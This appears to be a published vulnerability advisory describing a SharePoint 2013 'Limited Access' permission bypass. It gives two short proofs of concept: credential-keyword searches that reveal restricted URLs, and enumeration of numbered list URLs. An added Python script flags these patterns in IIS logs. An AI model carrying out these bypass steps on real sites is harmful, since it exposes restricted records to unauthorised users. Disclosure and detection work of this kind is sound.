Microsoft SharePoint Limited Access Permission Bypass

Microsoft SharePoint suffers from a Limited Access permission bypass vulnerability.


MD5 | 0295554bf43ae5430a02da73edf4cfd7

Vulnerability Title: Microsoft SharePoint 'Limited Access' Permission Bypass

This vulnerability was discovered by 'Behnam Vanda' on January 07, 2018


======================
I. About Vulnerability
======================
A permission-level bypass vulnerability has been identified in Microsoft SharePoint 2013 and possibly prior versions. This vulnerability allows attackers to open or view restricted items in the site or library. An authenticated user can bypass the 'Limited Access' permission to browse a site page or library and access a specific content item that was restricted.

======================
II. Exploit
======================
#POC 1 :

1. Search for specific words in the web and mobile SharePoint search boxes: "password", "pass", "user", "domain\user", "name | lastname", etc.

[~] web search : http://site/BSearch/results.aspx
[~] mobile search : http://site/_layouts/mobile/MobileResults.aspx


example : http://site/BSearch/results.aspx?k=password
example : http://site/BSearch/results.aspx?k="NSA\1377"
example : http://site/_layouts/mobile/MobileResults.aspx?k=pass
example : http://site/_layouts/mobile/MobileResults.aspx?k=BOB


2. The page shows some SharePoint search results, such as URLs of restricted items, sites, and libraries.

3. Click the URLs to access, view, or read site pages and other restricted libraries and items.

--------------------------------------
#POC 2 :

After capturing packets between our system and the SharePoint site (using Fiddler, Burp Suite, Wireshark, etc.), we have access to item, list, page, and site URLs such as the following:

http://site/IT/Lists/List70/AllItems.aspx

Restricted items and lists can then be accessed by constructing /LIST#/ URLs.

For example:
http://site/IT/Lists/List100/AllItems.aspx
http://site/IT/Lists/List101/AllItems.aspx
http://site/IT/Lists/List102/AllItems.aspx
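
To look for the access patterns from POC 1 and POC 2 in IIS W3C logs, the following Python script is an added example and not part of the original advisory. It flags users who request several distinct /Lists/List<N>/AllItems.aspx URLs or who search for credential-style keywords; the log lines, user names, keyword watch list, and threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed IIS W3C log sample (not from the advisory); users and IPs are made up.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2018-01-07 09:00:01 GET /IT/Lists/List70/AllItems.aspx - CORP\\alice 10.0.0.5 200
2018-01-07 09:01:10 GET /IT/Lists/List100/AllItems.aspx - CORP\\mallory 10.0.0.9 200
2018-01-07 09:01:12 GET /IT/Lists/List101/AllItems.aspx - CORP\\mallory 10.0.0.9 403
2018-01-07 09:01:14 GET /IT/Lists/List102/AllItems.aspx - CORP\\mallory 10.0.0.9 200
2018-01-07 09:02:00 GET /BSearch/results.aspx k=password CORP\\mallory 10.0.0.9 200
2018-01-07 09:02:30 GET /_layouts/mobile/MobileResults.aspx k=quarterly+report CORP\\alice 10.0.0.5 200
"""

LIST_RE = re.compile(r"/Lists/List(\d+)/AllItems\.aspx$", re.I)
SEARCH_RE = re.compile(r"/(results|MobileResults)\.aspx$", re.I)
KEYWORDS = ("password", "pass", "user", "domain")  # assumed watch list, tune per site

def parse(log_text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_suspects(log_text, min_lists=3):
    """Return (list enumeration per user, sensitive search terms per user)."""
    lists, searches = defaultdict(set), defaultdict(list)
    for rec in parse(log_text):
        user, stem = rec["cs-username"], rec["cs-uri-stem"]
        m = LIST_RE.search(stem)
        if m:
            lists[user].add(int(m.group(1)))  # distinct List<N> ids per user
        elif SEARCH_RE.search(stem):
            for term in parse_qs(rec["cs-uri-query"]).get("k", []):
                if any(k in term.lower() for k in KEYWORDS):
                    searches[user].append(term)
    # min_lists is an assumed threshold for "several distinct lists"
    enum = {u: sorted(n) for u, n in lists.items() if len(n) >= min_lists}
    return enum, dict(searches)

if __name__ == "__main__":
    print(find_suspects(SAMPLE_LOG))
```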

======================
III. Affected Systems
======================
Microsoft SharePoint 2013 & maybe prior

----------------------
Behnam Vanda
[redhathackers]

E-Mail: beni[dot]vanda[at]gmail.com


